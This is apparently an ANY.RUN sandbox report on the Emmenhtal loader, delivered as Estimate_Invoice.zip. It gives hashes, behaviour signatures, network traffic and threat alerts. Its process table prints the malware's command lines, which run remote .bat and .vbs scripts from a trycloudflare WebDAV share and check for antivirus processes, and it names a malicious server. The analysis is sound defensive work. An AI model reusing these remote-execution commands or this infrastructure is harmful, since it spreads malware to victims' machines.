File name:

Estimate_Invoice.zip

Full analysis: https://app.any.run/tasks/76159599-3359-42e9-a3fd-9998d96fb742
Verdict: Malicious activity
Threats:

First identified in 2024, Emmenhtal operates by embedding itself within modified legitimate Windows binaries, often using HTA (HTML Application) files to execute malicious scripts. It has been linked to the distribution of malware such as CryptBot and Lumma Stealer. Emmenhtal is typically disseminated through phishing campaigns, including fake video downloads and deceptive email attachments.

Analysis date: January 22, 2025, 16:23:29
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
webdav
emmenhtal
arch-doc
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

578322B46D6F1BED3B7846EDD993DEA0

SHA1:

22AC7FE0B9A26D0D929601158FD399F9ED3C5C4A

SHA256:

4A3BF63C7C390946B3B90FD1132979363B9A59067ADE44224BE58ED5DAEFDB55

SSDEEP:

12:5jMaKdlR5rlTfUDdgklL/RYadWhavgtaxI:9MaulR/TsDbNWhavu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • WebDav connection (SURICATA)

      • svchost.exe (PID: 6580)
    • EMMENHTAL has been detected (SURICATA)

      • svchost.exe (PID: 6580)
    • Antivirus name has been found in the command line (generic signature)

      • tasklist.exe (PID: 4120)
      • find.exe (PID: 5752)
      • tasklist.exe (PID: 6148)
      • find.exe (PID: 6156)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 6676)
  • SUSPICIOUS

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 5872)
    • Get information on the list of running processes

      • cmd.exe (PID: 5780)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 5872)
    • Remote file execution via WebDAV

      • cmd.exe (PID: 5780)
      • wscript.exe (PID: 5872)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 5872)
    • Connects to unusual port

      • svchost.exe (PID: 6580)
      • WinRAR.exe (PID: 6296)
      • powershell.exe (PID: 6676)
    • Potential Corporate Privacy Violation

      • svchost.exe (PID: 6580)
    • Abuses WebDav for code execution

      • svchost.exe (PID: 6580)
    • Uses RUNDLL32.EXE to load library

      • svchost.exe (PID: 6580)
    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 6296)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 5780)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 6676)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6676)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 6880)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 6880)
    • Process drops python dynamic module

      • powershell.exe (PID: 6880)
  • INFO

    • The process uses the downloaded file

      • wscript.exe (PID: 5872)
    • Manual execution by a user

      • wscript.exe (PID: 5872)
    • Checks proxy server information

      • WinRAR.exe (PID: 6296)
      • powershell.exe (PID: 6676)
    • Local mutex for internet shortcut management

      • WinRAR.exe (PID: 6296)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6880)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6880)
    • The sample compiled with english language support

      • powershell.exe (PID: 6880)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2025:01:22 14:35:30
ZipCRC: 0x0546b88d
ZipCompressedSize: 134
ZipUncompressedSize: 151
ZipFileName: 1SAVBSAYHNBMASA.url
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
146
Monitored processes
13
Malicious processes
3
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winrar.exe #EMMENHTAL svchost.exe rundll32.exe no specs svchost.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs find.exe no specs tasklist.exe no specs find.exe no specs powershell.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
4120tasklist /FI "IMAGENAME eq AvastUI.exe" C:\Windows\System32\tasklist.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5032\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5752find /i "AvastUI.exe" C:\Windows\System32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\find.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
5780"C:\Windows\System32\cmd.exe" /c \\visitor-deputy-christmas-halo.trycloudflare.com@SSL\DavWWWRoot\new.batC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
5872"C:\WINDOWS\System32\WScript.exe" "\\visitor-deputy-christmas-halo.trycloudflare.com@SSL\DavWWWRoot\new.vbs" C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6148tasklist /FI "IMAGENAME eq avgui.exe" C:\Windows\System32\tasklist.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6156find /i "avgui.exe" C:\Windows\System32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\find.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
6296"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\Estimate_Invoice.zipC:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
6480C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\System32\rundll32.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
Total events
13 690
Read events
13 680
Write events
10
Delete events
0

Modification events

(PID) Process:(6296) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(6296) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(6296) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(6296) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\Estimate_Invoice.zip
(PID) Process:(6296) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(6296) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(6296) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(6296) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(6296) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:writeName:{FBF23B40-E3F0-101B-8488-00AA003E56F8} {000214E4-0000-0000-C000-000000000046} 0xFFFF
Value:
01000000000000000EEE0A01EA6CDB01
(PID) Process:(6296) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
Executable files
41
Suspicious files
251
Text files
1 468
Unknown types
0

Dropped files

PID
Process
Filename
Type
6580svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\{0E9C8D63-0403-4934-9D8F-A3B1027DCBD4}.zip
MD5:
SHA256:
6580svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\{2DCDF93C-FAC5-4F59-8082-55C18B3427A0}.zip
MD5:
SHA256:
6676powershell.exeC:\Users\admin\Downloads\downloaded.zip
MD5:
SHA256:
6880powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_syt1sfog.j25.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6580svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\{69D7C553-86DD-47B1-9698-4BF5BC02CE83}.battext
MD5:214DD7B385CBEF755B375A2670F93540
SHA256:0BFDE78A02CA0C04C294556CA7085266BF94F2B1009194FD2092340170524F51
6676powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:EB356FCF5AC1D9698519F91199A17DB5
SHA256:161AA3C122CE2E4C09D2156C2DED9DB2C768C1C78D7CC0B26700C7DAE9814507
6676powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lrrllx3b.5yu.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6880powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_15fwywm1.xrk.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6580svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\{F2B70F7E-A7E0-419C-8AB9-1F8EE9FF9C8D}.battext
MD5:214DD7B385CBEF755B375A2670F93540
SHA256:0BFDE78A02CA0C04C294556CA7085266BF94F2B1009194FD2092340170524F51
6880powershell.exeC:\Users\admin\Downloads\Extracted\Python\Launcher\py.exeexecutable
MD5:79EAE4FA8DD7E1CA489E59AB19B4FBED
SHA256:E52553F941CEB9E715D239E7A211501CE5D6096EEEB90FB161B7BFEDF6A61DAB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
23
TCP/UDP connections
47
DNS requests
18
Threats
20

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6296
WinRAR.exe
OPTIONS
200
45.202.32.77:7530
http://jsnybsafva.one:7530/
unknown
unknown
6580
svchost.exe
OPTIONS
200
45.202.32.77:7530
http://jsnybsafva.one:7530/
unknown
unknown
6580
svchost.exe
PROPFIND
207
45.202.32.77:7530
http://jsnybsafva.one:7530/
unknown
unknown
6580
svchost.exe
PROPFIND
207
45.202.32.77:7530
http://jsnybsafva.one:7530/1FSABRY8KASVAB
unknown
unknown
6580
svchost.exe
PROPFIND
207
45.202.32.77:7530
http://jsnybsafva.one:7530/
unknown
unknown
6580
svchost.exe
PROPFIND
207
45.202.32.77:7530
http://jsnybsafva.one:7530/1FSABRY8KASVAB
unknown
unknown
6580
svchost.exe
GET
200
45.202.32.77:7530
http://jsnybsafva.one:7530/1FSABRY8KASVAB/1FSABRY8KASVAB_pdf.lnk
unknown
unknown
1176
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6580
svchost.exe
PROPFIND
207
45.202.32.77:7530
http://jsnybsafva.one:7530/1FSABRY8KASVAB
unknown
unknown
6580
svchost.exe
PROPFIND
207
45.202.32.77:7530
http://jsnybsafva.one:7530/1FSABRY8KASVAB
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
6296
WinRAR.exe
45.202.32.77:7530
jsnybsafva.one
MULTA-ASN1
MU
malicious
5160
RUXIMICS.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6580
svchost.exe
45.202.32.77:7530
jsnybsafva.one
MULTA-ASN1
MU
malicious
2736
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5064
SearchApp.exe
104.126.37.129:443
www.bing.com
Akamai International B.V.
DE
whitelisted
1176
svchost.exe
20.190.159.71:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1176
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
jsnybsafva.one
  • 45.202.32.77
unknown
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
www.bing.com
  • 104.126.37.129
  • 104.126.37.130
  • 104.126.37.139
  • 104.126.37.123
  • 104.126.37.144
  • 104.126.37.128
  • 104.126.37.145
  • 104.126.37.131
  • 104.126.37.186
whitelisted
login.live.com
  • 20.190.159.71
  • 40.126.31.69
  • 40.126.31.73
  • 20.190.159.0
  • 20.190.159.73
  • 20.190.159.75
  • 20.190.159.23
  • 20.190.159.2
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
visitor-deputy-christmas-halo.trycloudflare.com
  • 104.16.230.132
  • 104.16.231.132
whitelisted
go.microsoft.com
  • 23.218.210.69
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted

Threats

PID
Process
Class
Message
6296
WinRAR.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 5
6580
svchost.exe
Misc activity
ET HUNTING Successful PROPFIND Response for Application Media Type
6580
svchost.exe
Misc activity
ET INFO LNK File Downloaded via HTTP
6580
svchost.exe
A Network Trojan was detected
ET MALWARE PeakLight/Emmenhtal Loader Payload Request
6580
svchost.exe
Potential Corporate Privacy Violation
POLICY [ANY.RUN] A suspicious Lnk file was downloaded causing the exe file to be executed
6580
svchost.exe
Potential Corporate Privacy Violation
POLICY [ANY.RUN] A suspicious Lnk file leading to a WebDAV resource was downloaded
6580
svchost.exe
A Network Trojan was detected
MALWARE [ANY.RUN] A malicious Lnk file was loaded that leads to the TryCloudflare WebDAV proxy server
6580
svchost.exe
Misc activity
ET HUNTING Successful PROPFIND Response for Application Media Type
6580
svchost.exe
Misc activity
ET HUNTING Successful PROPFIND Response for Application Media Type
6580
svchost.exe
Misc activity
ET HUNTING Successful PROPFIND Response for Application Media Type
No debug info